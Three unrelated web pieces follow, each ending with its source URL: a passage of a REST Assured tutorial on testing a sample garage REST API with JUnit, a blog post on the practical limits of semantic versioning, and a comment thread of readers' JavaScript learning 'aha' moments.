This JUnit test connects to Google, performs a GET call and makes sure that HTTP code 200/success is returned. Notice the complete absence of the usual JUnit assert statements. REST Assured takes care of this for us and will automatically pass/fail this test according to the error code. The flexibility of the given(), when(), then() methods will become apparent in the following sections of the tutorial.

Setting up REST Assured

Using the REST Assured library in a Java project is very straightforward, as it is already a part of Maven Central. We need to modify our pom.xml file as follows:

    <dependencies>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.hamcrest</groupId>
            <artifactId>hamcrest-all</artifactId>
            <version>1.3</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>com.google.code.gson</groupId>
            <artifactId>gson</artifactId>
            <version>2.6.2</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>com.jayway.restassured</groupId>
            <artifactId>rest-assured</artifactId>
            <version>2.9.0</version>
            <scope>test</scope>
        </dependency>
    </dependencies>

REST Assured works on top of JUnit and therefore assumes that it's installed. Hamcrest Matchers are optional, and are not strictly needed for REST Assured. They allow us to write more expressive unit tests. Gson is automatically used by REST Assured for JSON (de)serialization, as we will see in the examples. REST Assured can also work with Jackson, if that is available in the classpath. With the compile-time dependencies out of the way, we should also define a base Java class that will allow us to select the server that contains the REST endpoints.
We can name this class as we see fit, but it is important since it will be used as a base class for all REST Assured tests.

    public class FunctionalTest {

        @BeforeClass
        public static void setup() {
            String port = System.getProperty("server.port");
            if (port == null) {
                RestAssured.port = Integer.valueOf(8080);
            } else {
                RestAssured.port = Integer.valueOf(port);
            }

            String basePath = System.getProperty("server.base");
            if (basePath == null) {
                basePath = "/rest-garage-sample/";
            }
            RestAssured.basePath = basePath;

            String baseHost = System.getProperty("server.host");
            if (baseHost == null) {
                baseHost = "";
            }
            RestAssured.baseURI = baseHost;
        }
    }

This class prepares REST Assured with a default target, which is the context root of the application we are going to test. At the same time, it also allows us to set up a different web context using command line arguments. For example, to change this to another server and port we could run:

    mvn test -Dserver.port=9000 -Dserver.host=

This will run the same suite of tests for an application deployed at. Thus a build server could run our REST Assured tests against different environments.

HTTP API of a Sample Java Application

For this tutorial, we will test a sample REST application that deals with a garage. The garage has 150 spaces for cars. The API can be summarized as follows:

- a GET call at /garage returns information of filled/free car parking slots,
- a POST call at /garage/slots parks a new car at the next free parking slot, and
- the responses it returns are also in the JSON format.

REST Assured also supports XML, but for this tutorial we will focus on JSON.

Testing HTTP Error Codes

We'll start with REST Assured by verifying the HTTP error codes of our application. First of all, we want to verify that our application has deployed correctly by calling the /garage URL and making sure that the success (200) HTTP result is returned.
Here is the unit test:

    public class GarageRestTest extends FunctionalTest {

        @Test
        public void basicPingTest() {
            given().when().get("/garage").then().statusCode(200);
        }
    }

Here, we extended the FunctionalTest class we've created before in order to define the context root of our application. This makes the test more readable, as only the actual REST endpoint is contained in the test. Running this test will make sure that our application is up and running. Testing HTTP error codes becomes very useful when we want to make sure that our application behaves correctly, even when the input data is wrong. We already know that our garage has only 150 parking spaces. Therefore, a query to a parking space that exceeds this number should probably return a 404 (not found) error. Here is the respective code:

    @Test
    public void invalidParkingSpace() {
        given().when().get("/garage/slots/999")
            .then().statusCode(404);
    }

Now that we know the basics, we can start verifying the body of HTTP responses as well.

Testing GET Calls and Their Responses

The majority of our REST functional tests will probably be simple GET calls that will make sure that the application is in a valid state. REST Assured offers several ways to examine the content of the response body. A basic call to the top level URL of our service (i.e. /garage) returns the following JSON object:

    {
        "name":"Acme garage",
        "info":{
            "slots":150,
            "status":"open"
        }
    }

The object holds the name of the garage and the number of total parking positions. The simplest way to test the body of a network response is by using string comparison. For example, to verify the name of our garage we can write the following:

    @Test
    public void verifyNameOfGarage() {
        given().when().get("/garage").then()
            .body(containsString("Acme garage"));
    }

This example shows how well REST Assured works with Hamcrest matchers. The body() method is provided by REST Assured and deals with whatever is returned from the call.
The containsString() method comes from Hamcrest and makes the test pass (or fail) if the body contains that string. The fact that REST Assured has built-in support for Hamcrest matchers means that we can write unit tests that closely resemble English sentences. This makes REST Assured tests very readable. It is possible to use REST Assured without Hamcrest matchers, but then our tests need more Java code for assertions. Here’s how we can test the response of the top URL in a more structured way:

    @Test
    public void verifyNameStructured() {
        given().when().get("/garage").then()
            .body("name", equalTo("Acme garage"));
    }

Here, we explicitly tell REST Assured that we want to verify the name property of the JSON object to its exact value. Reading this test feels very natural because it is very close to an English sentence: “When we get /garage, then the response body should have a name property which is equal to Acme garage”. Internally, REST Assured uses Groovy and allows for Groovy expressions inside its API. Teaching the whole Groovy syntax is outside the scope of this tutorial. Suffice it to say that Groovy allows us to access a JSON object using the standard dot notation as if it were a Java object. This allows us to test the inner part of the JSON object just by specifying its path inside the JSON object:

    @Test
    public void verifySlotsOfGarage() {
        given().when().get("/garage").then()
            .body("info.slots", equalTo(150))
            .body("info.status", equalTo("open"));
    }

When given a path like info.slots, REST Assured will search for an info property inside the JSON object, follow it and then get a slots property, which will finally be used for the unit test. This is a convenient way to examine only the part that we are interested in out of a big JSON object. Another thing to notice is the chaining of multiple body methods. This is one of the big advantages of the syntax of REST Assured, as it makes it possible for multiple checks to work in unison.
This unit test will succeed only if both checks on the response body are successful. In fact, we can chain any type of verifications offered by REST Assured together:

    @Test
    public void verifyTopLevelURL() {
        given().when().get("/garage").then()
            .body("name", equalTo("Acme garage"))
            .body("info.slots", equalTo(150))
            .body("info.status", equalTo("open"))
            .statusCode(200);
    }

Here, not only do we check all the properties of the JSON object, but we also want to make sure that the HTTP error code is 200, as shown in the previous section.

Sending Test JSON Data with POST Calls

We now know how to verify the READ operations of a REST API. Several REST endpoints also offer the ability to send data, via POST or PUT calls. REST Assured supports WRITE operations as well. A car enters the garage when its details are posted at /garage/slots. The JSON object expected by the service is the following:

    {
        "plateNumber":"xyx1111",
        "brand":"audi",
        "colour":"red"
    }

We need a way to create this JSON request. In its simplest form, REST Assured can create JSON objects from plain Java maps. This makes posting data very straightforward:

    @Test
    public void aCarGoesIntoTheGarage() {
        Map<String,String> car = new HashMap<>();
        car.put("plateNumber", "xyx1111");
        car.put("brand", "audi");
        car.put("colour", "red");

        given()
            .contentType("application/json")
            .body(car)
            .when().post("/garage/slots").then()
            .statusCode(200);
    }

Here, we've created a simple Java map and filled it with the values that represent JSON properties. Sending it with REST Assured requires the .contentType() method, but other than that, the map is passed directly to the body() method and REST Assured makes the conversion automatically to a JSON object. The response of the call is the status of the parking space:

    {
        "empty":false,
        "position":26
    }

This sample response shows us that the parking slot with number 26 is now occupied.
We can verify the “position” and “empty” properties using the chaining of body() methods, as already shown in the previous section.

    @Test
    public void aCarGoesIntoTheGarageStructured() {
        Map<String,String> car = new HashMap<>();
        car.put("plateNumber", "xyx1111");
        car.put("brand", "audi");
        car.put("colour", "red");

        given()
            .contentType("application/json")
            .body(car)
            .when().post("/garage/slots").then()
            .body("empty", equalTo(false))
            .body("position", lessThan(150));
    }

The lessThan Hamcrest matcher will fail the test if the position property is ever above 150. Using Java maps as the payload of a request means that we can create with them any JSON object on the spot for a specific test. For bigger JSON objects, an alternative solution would be to directly use a Java object. This makes the intent of the test very clear and also allows for more flexible verifications. First, we need to define the car object in Java:

    public class Car {
        private String plateNumber;
        private String colour;
        private String brand;

        [...getters and setters removed for brevity...]
    }

Now, we can construct a car object in a type safe manner and use that for our test instead of the Java map:

    @Test
    public void aCarObjectGoesIntoTheGarage() {
        Car car = new Car();
        car.setPlateNumber("xyx1111");
        car.setBrand("audi");
        car.setColour("red");

        given()
            .contentType("application/json")
            .body(car)
            .when().post("/garage/slots").then()
            .body("empty", equalTo(false))
            .body("position", lessThan(150));
    }

The REST Assured methods are exactly the same as with the previous test. We've only changed the request data to a Java object. In this trivial example, having a Java object instead of a map may not have clear advantages. In a real enterprise project where the JSON payload will be larger, it will be far easier to deal with objects instead of maps. Also, if our server code is already in Java, we can re-use the model objects directly from its source code.
In our example, there is a very high possibility that the server code already contains the file Car.java and therefore it can be copied/imported to the source code of the REST Assured tests without any additional effort. Now that we have the car object, it is also very easy to look at the whole JSON response object. REST Assured can deserialize JSON data to Java objects in a similar manner. Again, we define a new Java object from the return result:

    public class Slot {
        private boolean empty;
        private int position;

        [...getters and setters removed for brevity...]
    }

Now, we can use Java objects for both the request and the response of the call.

    @Test
    public void aCarIsRegisteredInTheGarage() {
        Car car = new Car();
        car.setPlateNumber("xyx1111");
        car.setBrand("audi");
        car.setColour("red");

        Slot slot = given()
            .contentType("application/json")
            .body(car)
            .when().post("/garage/slots")
            .as(Slot.class);

        assertFalse(slot.isEmpty());
        assertTrue(slot.getPosition() < 150);
    }

With the Slot object, we now have full control over the assert statements that test it and can write the usual JUnit verifications.

Reusing Data from a Previous Call to the Next One

All examples we have seen so far are self-contained in the sense that a single call is performed to the server and only a single response is evaluated. However, several times we need to examine a sequence of events and create calls that depend on the previous ones. In our sample application we need to test the event where a car leaves the garage. This is accomplished with a DELETE call at the /garage/slots/<slotNumber> URL. REST Assured can work with dynamic URLs as seen below:

    @Test
    public void aCarLeaves() {
        given().pathParam("slotID", 27)
            .when().delete("/garage/slots/{slotID}")
            .then().statusCode(200);
    }

Our test creates a URL that specifies parking position 27 using the .pathParam() method. The problem with this unit test is its uncertainty. By the time it runs, position 27 might be empty or not.
It's possible that another test has already unparked the car. Rather than guessing and making the result of the test non-deterministic, it is good practice to park the car ourselves and use the returned position for the DELETE call. This way, the exact number of the parking space becomes irrelevant, and the test can work with ANY position assigned at the time of running. REST Assured can extract information from a response while still verifying the call on its own. Here is a deterministic test that does not depend on the number of the slot assigned to the incoming car:

@Test
public void aCarEntersAndThenLeaves() {
    Car car = new Car();
    car.setPlateNumber("xyx1111");
    car.setBrand("audi");
    car.setColour("red");

    int positionTakenInGarage = given()
        .contentType("application/json")
        .body(car)
        .when().post("/garage/slots").then()
        .body("empty", equalTo(false))
        .extract().path("position");

    given().pathParam("slotID", positionTakenInGarage)
        .when().delete("/garage/slots/{slotID}").then()
        .statusCode(200);
}

This test has two REST calls. The first one is verified with the .body() method, but at the same time the .extract() method keeps the slot number. This slot number is then reused in the DELETE call, so that we unpark the car that has just entered. The garage can allocate any number to our car, and the test is no longer hard-coded to use the slot with number 27.

Integrating REST Assured Tests in the Build Process

REST Assured uses JUnit, so testing support in the build process is ready out of the box for the tools that support JUnit. It should be evident that REST Assured tests expect the application to be deployed, as they hit the HTTP endpoints directly. This makes REST tests different from plain unit tests, as they have requirements that are more complex than those of tests which depend only on Java source code. For a detailed tutorial on how to run REST tests in the build pipeline, see the previous tutorial on splitting JUnit tests.
Conclusion

In this tutorial, we have written unit tests for the REST endpoints of a sample application using the Java library REST Assured. We have seen:

- How to download and set up REST Assured via Maven,
- How to make REST Assured tests configurable so that we can select the host/port they check,
- How to write basic unit tests that check HTTP error codes,
- How REST Assured tests can send data in JSON format using Java maps,
- How REST Assured tests can send data in JSON format using Java model classes,
- How REST Assured tests can verify the response data with Hamcrest matchers,
- How REST Assured tests can extract response information for further validations, and
- How we can use REST Assured for tests that require multiple REST calls.

Where to Go from Here

We have just scratched the surface of REST Assured. There are several more features that can be used for REST testing:

- Validating JSON responses according to a schema,
- Working with XML data instead of JSON,
- Using Groovy closures or Java 8 lambdas for validating responses,
- Working with HTTP headers,
- Working with cookies,
- Posting form parameters,
- Using timeouts in tests,
- Testing different authentication methods and SSL, and
- Writing custom (de)serializers.

Even if our application has some special needs, there is a good chance that REST Assured has explicit support for that corner case or custom implementation. We hope that you now have a better understanding of REST Assured. If you have any questions or concerns, post them below. Feel free to share this tutorial with anyone you think might benefit from it.
https://semaphoreci.com/community/tutorials/testing-rest-endpoints-using-rest-assured
From the late 1500s onwards you start to see a trend appearing in the great estates of the time. A lot of the lords of the manor would construct whimsical or extravagant and typically useless structures to serve as conversation pieces or to decorate a view. They were known as follies. The pepper-pot tower in Powerscourt Gardens, Co Wicklow, Ireland. Some of the best follies are the sham ruins, which pretend to be the remains of old buildings, but which were in fact constructed in that state (e.g. the Temple to Philosophy at Ermenonville). Every time somebody brings up Semantic Versioning I am reminded of these follies. Now don't get me wrong, I love the ivory tower ideal that semantic versioning gives us:

- The patch version must be incremented if only backwards compatible bug fixes are introduced.
- The minor version must be incremented if new backwards compatible functionality is introduced to the public API.
- The major version must be incremented if any backwards incompatible changes are introduced to the public API.

Lovely. Perfect. What could possibly be wrong with that? Well, for a start, there is the real world… We rely on humans to decide on version numbering. Humans make mistakes. It's very easy to make a mistake and have a method signature change in a non-backwards compatible way. And once you find out that 2.4.5 is actually not a drop-in replacement for 2.4.4 with some minor bug fixes and should really have been called 3.0.0, your trust is gone. You are not going to trust that the project you are depending on understands semantic versioning, and you are back to the old way. What's that I hear you calling? Tooling to enforce semantic versioning? Hmmm, yes, an appealing siren's call is the tooling solution. Especially in Java, where we can use bytecode analysis.
We download the previous version of the artifact and compare the bytecode of the two to ensure that the public API class signatures only mutate in backwards compatible ways unless the major version number has changed. And if there are no changes to the public API, we allow the minor version to remain unmodified. Brilliant. I like that tooling. Very helpful. Still isn't going to guarantee semantic versioning compliance, though. In version 2.4.4, new FooBuilder().withoutBar().build() worked because you could build a Foo without a Bar in the implementation, but in 2.4.5 you can only build a Foo without a Bar if it has a Manchu, so new FooBuilder().withoutBar().withManchu(manchu).build() works, as does new FooBuilder().withManchu(manchu).withoutBar().build(), only my code is not written that way. To state it more bluntly, the public API is not just the classes and method signatures but the allowed patterns of usage of those classes and methods. If an API now requires that you make all calls to one set of methods from the same thread, or while holding a lock on some other resource, that's a backwards breaking change. Tooling cannot help you catch those changes. So yes, tooling is great, but it will not stop the problem, namely that we have humans writing the code and humans deciding what the next version number is, and humans make mistakes. Then there is marketing… The version numbers that developers want to use have absolutely no relationship with the version numbers that Marketing want to use. Just look at Microsoft Windows: [...table of Windows marketing names and their internal version numbers not reproduced...] What's that? You have a simple solution? We let marketing call it whatever the eff they want and we'll call it by the internal version number that we know it really is supposed to be! Hmmm, yes, another appealing siren is calling. Do you want to know what the problem is? I have a really simple example: I had to go and look up the mapping of Windows marketing versions to version numbers to get the table above.
Now, for something like an operating system it's not too big of a deal, but when you get deep into dependency hell and you have to select FooBar Ultra Pro 2012.7 from the issue tracker drop-down in order to file a support ticket against foobar 2.4.3, telling them that there are issues when using it with Manchu 7R2, also known as manchu:5.3.9, you may start to feel the pain. At a former employer of mine we had a big A0 sheet on the wall with each of the supported release versions of all the various components that made up the different product lines. When you get to that level of insanity, you know that something is wrong. Finally, on the JVM, there is the classpath… For anyone who is not on the JVM: you have the same great link time issue for dynamic libraries; static linking can sometimes get you out of jail, but it only works for so long… This issue crops up with Major version changes. As soon as you make a Major version change you are saying: I no longer promise that the old API even exists, let alone behaves the same as before. Well, that is fine, but if you don't change the namespace of your API at the same time, then anyone using third-party code that happens to depend on the older version of your API is dead in the water. They have their code requiring the new API and also simultaneously requiring code that requires the older version of your API. That is the ultimate dependency hell. Changing namespace allows both versions to co-exist… but it also means that everyone has pain to adopt the new version… and you may be left trying to support two versions: the one you want to support and the one you didn't want to, with its ugly old API. So does that mean Semantic Versioning is useless? Nope. It is actually a noble goal. An ideal we should all aim and strive for. Just keep in mind that you will never reach that goal. You will make mistakes.
No amount of tooling or process you put in place will prevent the mistakes you will make, so when putting tooling or process in place, be sure to evaluate the gain it is really giving you against the pain it is causing. For example, using tooling to validate the bytecode changes of your public API against the previous version, when done right, is a quick and easy win… so adding that to your build is nice… you may not want it for every build, only as a pre-flight check before releases or as run by the CI build server. On the other hand, mandating code reviews of all changed code paths, where each line of code changed is assessed for impact, may not be a process you want to introduce for every project… (I'd hope it is there for the JVM runtime libraries though ;-) as the risk of breaking changes is very high in that public API.) Hopefully this has got you thinking, and hopefully you will start to use some of the best practices encapsulated in Semantic Versioning within your own projects… but if you think I am going to trust a version range over semantic versions to let the machine automatically decide what version of a third-party dependency my code will use… you are sadly mistaken. Version ranges are a hint to the human to let them know what range they should consider when manually specifying the version to use.
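As a footnote, the three SemVer rules quoted at the top of the post can be condensed into a toy bump calculator. This is only a sketch (real tooling such as node-semver does far more), and the function and field names are invented for illustration; note that the hard input, deciding whether a change is breaking, is exactly the human judgement the post argues tooling cannot replace.

```javascript
// Toy sketch of the SemVer bump rules. The "change" description is the
// part a human must get right; the arithmetic is the trivial part.
function requiredBump(change) {
  if (change.breaking) return "major"; // backwards incompatible change
  if (change.newApi) return "minor";   // new backwards compatible functionality
  return "patch";                      // backwards compatible bug fixes only
}

function bump(version, level) {
  var p = version.split(".").map(Number); // [major, minor, patch]
  if (level === "major") return (p[0] + 1) + ".0.0";
  if (level === "minor") return p[0] + "." + (p[1] + 1) + ".0";
  return p[0] + "." + p[1] + "." + (p[2] + 1);
}

console.log(bump("2.4.4", requiredBump({})));                 // "2.4.5"
console.log(bump("2.4.4", requiredBump({ newApi: true })));   // "2.5.0"
console.log(bump("2.4.4", requiredBump({ breaking: true }))); // "3.0.0"
```

The 2.4.5-that-should-have-been-3.0.0 story above is precisely the case where the wrong flags get passed in, and no version arithmetic can save you.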
https://www.cloudbees.com/blog/semantic-versioning-folly
If you feel like you have a decent understanding of JavaScript, what was your "Ah ha!" moment? Or are you still waiting for it? For me, I had never written a line of JavaScript in my life but I picked up the book Learning jQuery and started reading it on a flight. I had the moment when I realized jQuery was essentially a "find something, do something" library. I already knew CSS, and jQuery used CSS selectors for the "find something" part. "Do something" in jQuery can be as simple as "click", "hide", "show", "slideToggle", etc. Even I can do that, I thought, and I rushed to my hotel room and started playing.

For me that moment was when I realized that everything was an object.

Me too! Thinking in objects changes everything!

Chalk up one more for everything is an object. This also kind of went hand in hand with a DOM "ah ha!" later that day for very similar reasons.

me too! i was totally stunned about that! :D

Could someone elaborate on this? I've heard this before as being really important but still don't quite understand. Thanks!

Thanks @Charlie for your response. Indeed, time is money and it makes no sense to go back in time to learn deprecated APIs when the entire world is looking forward to being ultra productive. When I was a kid I destroyed all my toys looking for the reasons of how they worked; and in the same way it makes me feel sad how many people use jQuery every day without a real understanding of what is going on behind the scenes. Do you know, as @ezekiel stated, that JS is (in its own way) 100% Object Oriented by itself? I wrote a thesis only with that research! Feel free to take a look at the website, still located in the labs of my company.

One more vote for everything is an object. Everything is very simple after learning that.

Realizing what 'objects' are helped me with ALL my programming. PHP has benefitted immensely, for example.

My Aha-moment with javascript is yet to come, but I sure had one when I read that Salvi guy's comment! :)

Its an object!
Then suddenly it was all clear.

Definitely the "it's an object!" moment. Totally changed how I write Javascript.

I SO wish Javascript were object-oriented. Javascript, while object-based, is prototype-oriented. Now that doesn't mean that you can't do things with the language that make it *appear* object-oriented. You can. But it's not part of the language syntax.

1 more for this.

But javascript is object oriented. It's just not classical. Saying it's not object oriented because there are no classes is like saying there are no variables just because there's no strict typing.

Everything is an object :) If you like that approach you should try Ruby. Numbers, code blocks, classes, and basically everything is an object. To be paradoxical, the Class of the Class object is itself.

My javascript Ah-ha! moment was when I realized how similar it was to PHP. Set up variables, set up functions, grab from the dom, process, output… that's about it.

Me too! WOOT! go PHP!!!

I think you will soon have an "Ah-ha" moment when you realize javascript and PHP are actually not similar. Client-side vs server-side… the only thing similar about them is that they are both programming languages.

Mine was JavaScript closures, after blowing it on an interview. I knew I really had to get my head wrapped around closures. So if I may impart unto all here, this is my take on closures and I hope it helps: As I understand it, at a basic level, a closure is a returned function that encapsulates (not references) variables/values from the parent function that returned it. I hope my explanation is right and, if so, I hope it helps someone here.

A closure is the set of local variables that are kept alive after a function call* has completed, because those variables may still be required by a local function, and a reference to a local function has somehow been exported during the function call.
The local function can be returned by the enclosing function (that's one way of exporting its reference), but there are other common ways too: the local function can be attached to an event, pushed onto an array, anything to prevent it from being dereferenced once the enclosing function has completed.

* It doesn't have to be functions, it can be any execution context, but let's just leave it at function calls for now, shall we?

A closure is effectively all the stuff that belongs to an expired execution context that cannot yet be discarded because there are still references to it. I can't say I can describe getting closures as a JavaScript a-ha moment though, it was a separate a-ha moment altogether, beyond JavaScript. I mean, you can 'get' JavaScript a long time before getting closures, they're pretty advanced. Most people discover closures completely by accident, do a bit of reading, and then start using them by design, still without fully getting them. Which makes it such a tricky interview question, because it's the kind of thing people can use without really being able to explain. (And there are many difficult to read tutorials on the topic, which doesn't help.)

Now you have me wondering what kind of interview you can blow just by not understanding closures. They sound extremely important to advanced JavaScript understanding, but I'm a little surprised that you can blow an interview by not understanding them.

It was closures and then some. Really advanced JS role I was applying for.

@Lee Kowalkowski: A-haaa!! (well, here it is :D )

Closures, I know what they are but reading a written explanation still confuses me. Stoyan Stefanov draws you a diagram. I looked at that and the light in my head went on. It's a brilliant book: Object Oriented Javascript by Stoyan Stefanov.

Hmmm, most recently, a minor aha moment that I had was realizing how very little of the javascript that I work with should operate before DomReady.
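Going back to closures for a moment: the descriptions above can be reduced to a minimal runnable sketch (the names here are invented for illustration). The local variable count outlives the call to makeCounter because the function that gets returned still references it.

```javascript
function makeCounter() {
  var count = 0;          // local variable of this particular call...
  return function () {    // ...captured by the function we export
    count += 1;           // still alive and writable after makeCounter returns
    return count;
  };
}

var tick = makeCounter();
console.log(tick()); // 1
console.log(tick()); // 2

// Each call to makeCounter creates its own independent closure:
var other = makeCounter();
console.log(other()); // 1, not 3
```

Returning the inner function is only one way to export it, as noted above; assigning it to an event handler or pushing it onto an array keeps the same variables alive in exactly the same way.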
And the only way to do a great domready cross-browser is with something that has been tested, like jQuery's domready functions, or the DomReady library that was taken out of jQuery. Essentially a realization that before jQuery, I was probably doing it all wrong anyway.

Err, I meant to say that even .hide() or .show() need to be wrapped in domready. Sooooooooooooooooooooooo… damn near everything except function declarations. Long live jQuery.

1. Everything is an object. 2. Closures. 3. Functions can be stored and passed around.

Seconded. Once you can wrap your mind around these three things, you can go from "doing things with javascript" to "creating things with javascript".

Same three as above for me as well.

Also 'anonymous' functions. One can just pass the entire function body to another function.

Much the same as hector. My aha! moment is when I started learning to create objects in vanilla javascript. It really makes things click when you come to understand that a method is just a function inside of a function. My second aha! was when I started understanding that everything is an object.

It's funny that you post this because last night while I was re-designing my site I Googled jQuery to learn more about it. I'm now (6 hours later) understanding a lot of it. So I guess my ah-ha moment would be when I realized that jQuery & JavaScript have so much potential and, like mentioned above, it's just an object oriented language. I always got scared seeing it used on your site, now I'm ready!

Actually, jquery is about "when something happens, find something, do something", because javascript is event-based. My Ah-ha! moment has yet to come, I guess xD

Well, I disagree with your "JavaScript is event-based" statement… JavaScript is object oriented (prototype style) with some functional programming baked in.
You can define how your document elements (objects) will behave when some event is triggered, but the event handlers are object properties… the DOM and browser window can trigger events, not the JS.

I don't remember ever having a javascript ah ha moment and I've been coding in it for several years. I think it's because javascript is so lenient and functional it lets programmers express themselves in a way that's already familiar to them.

Mine was when I found that every operation returns a value. I was trying to create some sequential animations and everything kept running at once. I found an example out there in the vast interwebs that nested a function inside a function. My elements started moving the way I wanted them to and I was off and running. Everything started being fun after that.

I started playing with JS in its early years in netscape, and everything was kinda fuzzy at that time, but my A-HA moment was when I discovered the relationship between DOM and JS Objects and that you could access parents and siblings via methods. Basically it was a double-a-ha for me since the DOM idea clicked for me as well. Come on guys, that was 1998 or something :-)

A few years back, when I first started doing ajax requests by hand (not jQuery at the time). Until then everything I wrote was simply procedural/functional code, and I didn't worry about event based or object-oriented patterns. This was also when I started learning how to avoid the old inline onClick='doEvent()' and start using unobtrusive JavaScript.

I was looking into JavaScript and then came to know about the concept of lambda functions and closures. It was mind-blowing. All the thanks to Mr. Crockford.

Like many others, understanding closures was when it all somehow clicked together. And even after I thought I knew javascript, reading Stoyan Stefanov's "JavaScript Patterns" was full of small ah ha! moments.

I second Stoyan's book "Javascript Patterns"!!
So many ah ha moments in that book that it's essential for higher level javascript! Well worth the price and goes a long way!

I'm just at the beginning of JavaScript's possibilities, but my recent JS AHA moment was when I understood the concept of passing arguments to functions and the general use of OOP :-)

Well, coming from the ActionScript world (don't hate), what clicked for me was that DOM Elements are like MovieClips.

You just gave me an ActionScript moment. Too bad I have no need or desire to use it ever again.

I had three major ah-ha moments in the various stages of expertise: 1. Before learning Javascript, code was always executed immediately and the only halting was done through user prompts. My first "ah ha" moment came when I realized code could be encapsulated in functions and attached to certain events. 2. My second "ah ha" moment came when I was able to separate the idea of Javascript from the DOM. DOM manipulation is just one use of Javascript, but it is not Javascript itself. 3. Finally, and more recently, the Douglas Crockford Yahoo videos have added a significant depth to my understanding. The mysterious things that jQuery and other libraries did finally made sense when I managed to grok the prototype chain and look at all data and functions as objects.

The big moment for me was when I learned about the module pattern for creating objects in JS. That was my first taste of object-oriented JS, and it changed my code from a pile of functions to a structured web application.

I agree. Using design patterns was the eureka moment for me. They are a lot more vital to well written JavaScript than they are to PHP. The book that opened the door for me was Pro JavaScript Design Patterns by Dustin Diaz and Ross Harmes.

Module pattern, yes! I think it has changed my view of javascript.

Another vote for the module pattern here… however, I find myself using the revealing module pattern most of the time, to be specific.

I am no JavaScript master..
tbh I am not really sure what closures are… though I may use them. I had two ah-ha's so far. 1. Javascript is prototypal.. that word didn't make sense to me until I realised it meant "almost object oriented". 2. A lot of JavaScript directly targets the DOM. Before jQuery was around, or at least common, I had only used it for timers and the like. But libraries have made a lot of people do more things with the DOM than they would have before.

You had a jQuery ah-hah moment. The JS one is yet to come.
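For anyone wondering what the (revealing) module pattern mentioned a few comments up actually looks like, here is a small sketch; the module and its members are hypothetical names for illustration. An immediately invoked function creates a private scope and returns only the members chosen for the public API.

```javascript
// Revealing module pattern: private state lives in the closure,
// and only the revealed functions can touch it.
var counterModule = (function () {
  var count = 0;                 // private: not reachable from outside

  function increment() {         // private helpers...
    count += 1;
  }

  function current() {
    return count;
  }

  // ...revealed as the public API
  return { increment: increment, current: current };
})();

counterModule.increment();
counterModule.increment();
console.log(counterModule.current());    // 2
console.log(typeof counterModule.count); // "undefined": the variable stays private
```

This is also a closure in disguise: the revealed functions keep count alive long after the wrapping function has returned.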
Mine was when I found out that "$" was the name of the jQuery function and you were just passing parameters to it and it was doing all of the hard work to find those elements/objects. For the longest time I was using jQuery not really knowing what it was doing (yes, I learned jQuery before JS).

yes! the $ comprehension is a cool sample of an ah-ha moment!

Still waiting for my ah-ha moment…

Jamie, read the "jquery types" article… after this, your ah-ha moment will come…

Mine was when I had to make a flash menu that used a mysql database on a magento ecommerce site. I was very much learning actionScript, javaScript, php, and mysql all at the same time. I used php to list the menu items in a js variable that I then read through actionScript's externalInterface class. The moment I got the 'ah ha' was when I finished and realized I could have made things much simpler without Flash.

We all love the mighty jQuery, but those who never struggled with the plain JS API, and learned how and WHY client and server scripts work, in my perception have fewer chances to face a real, challenging Web programming environment. I had been working for more than 3 years with jQuery so far (and another three years without it), and a lot of times I needed to load something with my old friend document.getElementById(), or parse an XML with a classic for, or create a CSV file reading from my old friend the classic array. Summary: in order to fully understand jQuery, and hence be able to fight any situation jQuery doesn't cover (there are many, even if they are hard to find), it is a must to have a strong JS background. So… who is with me? :-)

That's a very good point, Salvi. It's a bit like wanting to slam dunk without learning how to dribble. Fundamentals first, play of the day later. However, I've got so much to do and so little time. Most of us have to start where we are and get moving. I'm gonna stick with Coffeescript and jQuery and follow along from there.
I simply don't have the time to get to the fundamentals of Javascript. If I ever build something that backs me into one of the corners you describe, I'll pay you a bunch of money to bail me out.

Charlie, I used to say the same thing. I was stronger in jQuery, weak in natural JavaScript. For the longest time I was very able to code in jQuery and achieved desired results, but I also never really understood why they worked that way. I was then thrown into an environment that was chaotic jQuery and old school properly written javascript with objects, functions, loops, and the like. Let me tell you, I went from feeling like a savant to feeling like a monkey scratching his head. I think it's also a misconception that jQuery "saves people so much time". To a degree, and for certain things, yes, but doing some things in standard JavaScript is actually faster, both coding wise and performance wise. Anyway, my point is don't be so quick to dismiss fundamental JavaScript. You might be surprised when you need it. Also, if you don't understand the fundamentals of JavaScript, you're probably writing code that's horribly formatted & performs badly as well. Putting a bandaid on a flat tire might get you home, but it won't get you to Canada.

When I realized that almost everything is an object, and what is not can at least behave like one, and of course 'closures'. Once you get it, you can feel like you really know the language. Also, I think I noticed too late that javascript has functional scope; I would have liked to know that from the beginning :S

Just what the f**k "this" was referring to…

Love this one. I have had this realization twice in the past two weeks. 1. If you call setTimeout, this now references window, so inside a function you have to do this:

function someFun() {
    var newThis = this;
    setTimeout(function () {
        alert(newThis);
    }, 100);
}

The interesting thing is that the scope of the inner function is global but you can reference a local variable from inside the function.
Weird?? 2. I recently started working with Backbone/Underscore and this changes all the time, and you really have to follow your scope.

My aha moment was when I unknowingly used closures in the process of finding a solution to a problem. I was glad that I finally had a bit of understanding of it after struggling for a long time. And also some aha moments while reading Stefanov's OO Javascript.. Awesome book it is.

– nice feed, i'm working on a similar thing but all html related

First off, I have to say – long time reader/lurker here but I just have to give kudos to you, Chris. Your posts are always on the leading edge of what's new and fresh and I cannot tell you how much I learn from CSS Tricks. So for that I want to thank you – a million times over. As for the question: …when I realize I haven't missed any semicolons and everything works as I intended.

Still waiting for it, I'm a newbie to jQuery and JS… can someone show me a path to the rabbit hole?

You should go take a look at Jeremy Keith's book on Javascript, it's called "DOM Scripting – Web Design with javascript and the Document Object Model". I'm currently going through it and so far it's taught me a lot! (I'm a beginner with js too)

Check out Nettuts' "30 days to learn jQuery" course, you'll get a good start with that, then some of the other blogs will begin to make a little more sense, until you have your lightbulb moment and then they'll all make sense.

That when you create a new object, you (more or less) are creating a copy of its prototype. My "aha" moment has been comprised of several small ones. The biggest of those was the concept of creating classes in Javascript. ex.

Your comment is an a-ha moment. I originally thought it was when I accessed the prototype of my own custom object of arrays, but this opens a new door for manipulating the DOM that I hadn't considered.
